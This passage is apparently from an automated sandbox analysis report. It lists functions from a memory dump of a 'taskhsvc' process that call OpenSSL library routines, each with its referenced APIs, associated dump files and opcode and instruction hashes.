                                                            • Instruction ID: cc0171aa06af1b7daafd6d84d5947c6db8880095a1063f551280ecbb7824f3e2
                                                            • Opcode Fuzzy Hash: df1a2d29b0fe8b7dea977d2664622ddffafbf59aeb1b16b015e5c60f2e9504b1
                                                            • Instruction Fuzzy Hash: C0F0177050AB009FCB00EF31C584B8BBBF4AF49348F02081CD5959B700D770A504CBA1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CF16DA0 Relevance: 6.0, APIs: 4, Instructions: 26COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ASN1_item_i2d.LIBEAY32 ref: 6CF16DC5
                                                            • __stack_chk_fail.LIBSSP-0 ref: 6CF16DDA
                                                            • ASN1_item_new.LIBEAY32(?,?,?,?,?,?,?,?,?,?,6CE3F4F3), ref: 6CF16DF5
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: N1_item_i2dN1_item_new__stack_chk_fail
                                                            • String ID:
                                                            • API String ID: 1700296266-0
                                                            • Opcode ID: 2948cb9527a0399251f1baf5d1dd1176ef95141e83d40a3eb1893a92e984e995
                                                            • Instruction ID: e9276ee5a49141be4700974e350cdb4e46b07aebfdcb093596c3f6ee0e4ad043
                                                            • Opcode Fuzzy Hash: 2948cb9527a0399251f1baf5d1dd1176ef95141e83d40a3eb1893a92e984e995
                                                            • Instruction Fuzzy Hash: 40F0B7706196418FCB40EF39C28154BBBF1AB89208F16991CE6A4CBB04D330A545CF87
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CE848E0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: R_put_error__stack_chk_fail
                                                            • String ID: B
                                                            • API String ID: 738277180-1255198513
                                                            • Opcode ID: 24cf4cb4275da065704f1e426e5d83c7934781694e8a5665889c47c59823abec
                                                            • Instruction ID: d00041421eba3d5a61e4da759a85b088d02d677f26b7627fd8e565ed5a43d024
                                                            • Opcode Fuzzy Hash: 24cf4cb4275da065704f1e426e5d83c7934781694e8a5665889c47c59823abec
                                                            • Instruction Fuzzy Hash: 6911E5726093448FC710DF69D54064BFBF4FBC8328F12891EEAA89B710D3B5A945CB96
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CF48880 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 35stringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: strlen
                                                            • String ID: DER:
                                                            • API String ID: 39653677-232962361
                                                            • Opcode ID: 39c0290901ca7dd1ee4d01598c32bf45127dc3da98f249fab08a7b3333126237
                                                            • Instruction ID: f37ea83c21d87ca75195681e62c32ed5a03b4478e511cfaf3edd8c414605e98b
                                                            • Opcode Fuzzy Hash: 39c0290901ca7dd1ee4d01598c32bf45127dc3da98f249fab08a7b3333126237
                                                            • Instruction Fuzzy Hash: F4F0F970508B049FDB10EFA9C5D0A0BBFE4EB8A749F11891EE694D7701D231D9458B97
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CEC8E10 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • BIO_new.LIBEAY32 ref: 6CEC8E30
                                                              • Part of subcall function 6CEC4560: CRYPTO_malloc.LIBEAY32 ref: 6CEC458C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: O_mallocO_new
                                                            • String ID: :$r$s
                                                            • API String ID: 1843509399-1836192333
                                                            • Opcode ID: 3103ec384c60c76e040730de134702254e988afb1c57a70e36579e656b083383
                                                            • Instruction ID: 9b111a4916da4597e2deb73d7f8722873f48bc9b4c550e48ed19e3962181dd21
                                                            • Opcode Fuzzy Hash: 3103ec384c60c76e040730de134702254e988afb1c57a70e36579e656b083383
                                                            • Instruction Fuzzy Hash: 51F0F8B1A093119FDB10DF6ADA8055FBBF4EBC9618F52991EE5A48B300D231D8458B93
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CEF2C60 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 26COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: A$q$w
                                                            • API String ID: 0-3864771027
                                                            • Opcode ID: 2c311d1004ab74d34cd4fa1e79515e14eaff0df499c58c2752e3e7f3d257c6ca
                                                            • Instruction ID: 4500934d251f629454cfb242ab0257b6f57f0317ea735fd1fba37cafa4ef5b15
                                                            • Opcode Fuzzy Hash: 2c311d1004ab74d34cd4fa1e79515e14eaff0df499c58c2752e3e7f3d257c6ca
                                                            • Instruction Fuzzy Hash: 1DF03AB46087418FD704CF14C56571BBBF1BBD6308F62894DD9A84B790C7BAA906CF42
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CEBC430 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: R_put_error
                                                            • String ID: C
                                                            • API String ID: 1767461275-1037565863
                                                            • Opcode ID: 9ddabe5dcba67b4e40a4452cd1bfce946ca7ba304b91cdf7058e3a79e79a0392
                                                            • Instruction ID: be5cb3efc06ec1c7c1185edb9ce1288397bd1f51703f27d3619fbbe23d9a8a85
                                                            • Opcode Fuzzy Hash: 9ddabe5dcba67b4e40a4452cd1bfce946ca7ba304b91cdf7058e3a79e79a0392
                                                            • Instruction Fuzzy Hash: 1DF01D756087428FDB04DF24C11136AB7F0BB8530CF51891DD9996B740C775AA05CB86
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%